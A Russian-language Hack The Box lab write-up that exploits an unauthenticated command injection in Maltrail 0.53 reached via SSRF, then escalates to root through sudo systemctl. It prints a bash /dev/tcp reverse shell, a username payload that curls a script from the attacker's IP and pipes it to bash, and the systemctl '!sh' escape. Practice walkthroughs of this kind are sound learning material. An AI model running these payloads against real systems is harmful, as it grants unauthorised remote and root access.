Наталья Чабанова @Vespii

Разведка

Сканирование NMAP

Открыты 2 порта - 22(ssh) и 55555(WEB)

Сканирование dirsearch Они гении и у всех разные директории. В моем случае тут директория test2 самая привлекательная

Она должна выглядеть так Из интересного должны знать название и версию Maltrail 0.53

У нее есть уязвимость и вот про нее: https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/

Атака

В общем в Maltrail, была выявлена ​​уязвимость выполнения команд без аутентификации. Наличие инъекции команды в params.get("username") является причиной данной уязвимости.

С помощью SSRF + OS Command Injection, мы можем получить удаленный доступ к машине жертвы.

Kак сделать

Создаем файлик rev.sh

bash -i >& /dev/tcp/10.10.x.x/4444 0>&1

Запускаем сервер на Python

Теперь ловим запрос той загадочной директории /test2/ с помощью burp и поменять метод запроса на Post. Потом пишем следующее

username=;`curl свой ip/rev.sh | bash`'

Отправляем и молимся на обратный шел

Дальше по дефолту читаем user.txt

Root flag

Пишем sudo -l и видим такую картину

Вот собственно информация по уязвимости https://gtfobins.github.io/gtfobins/systemctl/#sudo

script /dev/null -c bash
sudo  /usr/bin/systemctl status trail.service
!sh

Читаем root.txt

Tags:

#hackthebox#easy#writeup